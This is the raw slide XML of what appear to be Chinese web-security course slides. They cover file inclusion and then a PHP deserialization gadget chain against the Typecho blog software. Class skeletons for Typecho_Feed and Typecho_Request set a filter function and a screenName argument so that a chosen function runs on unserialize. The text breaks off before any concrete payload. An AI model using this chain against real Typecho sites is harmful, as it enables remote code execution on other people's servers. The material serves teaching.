            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr lang="en-US" altLang="zh-CN"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2938073118"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1532831" y="3609984"/>
          <a:ext cx="10229028" cy="3291840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="2899048">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $item;	</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        $this-&gt;item = array(</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>            'author' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(),</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        );</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3781789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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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721490" y="837929"/>
              <a:ext cx="1415772"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文件包含</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形: 圆角 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{47450B5E-6CC0-4199-881F-949BEF72E82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244799" y="1588618"/>
            <a:ext cx="10348036" cy="1163612"/>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在开发</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应用时，开发人员通常会将一些重复使用的代码写到单个文件中，</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再通过文件包含，将这些单个文件中的代码插入到其它需要用到它们的页面中</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。文件包含可以极大的提高应用开发的效率，减少开发人员的重复工作，有利于代码的维护与版本的更新。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{59329509-2735-4B6D-90B3-0A680DDB9144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1604839" y="3090372"/>
            <a:ext cx="3168352" cy="3190249"/>
            <a:chOff x="1241134" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C6631384-B0F7-4805-BD3B-91B1FDD1DB43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1241134" y="3090372"/>
              <a:ext cx="2733577" cy="2398161"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="文本框 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C2B15A79-337F-4D6D-929D-9DD67B264633}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1365388" y="3294819"/>
              <a:ext cx="2572513" cy="1526979"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>配置文件</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>。用于整个</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>应用的配置信息，如数据库的用户名及密码，使用的数据库名，系统默认的文字编码，是否开启</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Debug</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>模式等信息</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>右侧</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>就是</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>wordpress</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>博客系统配置文件的部分内容。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{54100FB4-C144-438F-BD76-EAFE261D8EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8425846" y="3028778"/>
            <a:ext cx="3166989" cy="3982337"/>
            <a:chOff x="5062586" y="3090372"/>
            <a:chExt cx="2733577" cy="2926986"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{123A49EE-A712-4108-8829-C09CFEE7162A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5062586" y="3090372"/>
              <a:ext cx="2733577" cy="2398161"/>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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="文本框 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0F5E84CD-3160-468A-8693-302B1951E0A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5171970" y="3155036"/>
              <a:ext cx="2593651" cy="2862322"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>重复</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>使用的函数</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>。如连接数据库，过滤用户的输入中的危险字符等。这些函数使用的频率很高，在所有需要与数据库进行交互的地方都要用到相似的连接数据库的代码；在几乎所有涉及到获取用户输入的地方都需要对其进行过滤，以避免出现像</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>sql</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>注入、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>xss</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>这样的安全问题。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971066" y="3050689"/>
            <a:ext cx="3296231" cy="3262839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258914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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>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42"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="3" presetClass="entr" presetSubtype="10" fill="hold"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linds(horizontal)">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xmlns="" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="447973"/>
            <a:ext cx="11089233" cy="2672543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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思考：如何定义类</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Typecho_Request</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并成功利用？</a:t>
            </a:r>
            <a:endPar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如何充分利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1"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screenName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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属性？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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800" b="1"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通过构造函数实现两个私有变量的赋值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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800" b="1"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b="1"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Filter[0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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是要调用的函数；（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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800" b="1"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err="1"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screenName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"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是要输入的参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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2875335502"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="951720" y="3328293"/>
          <a:ext cx="10229028" cy="3291840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="2899048">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_filter = array();</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
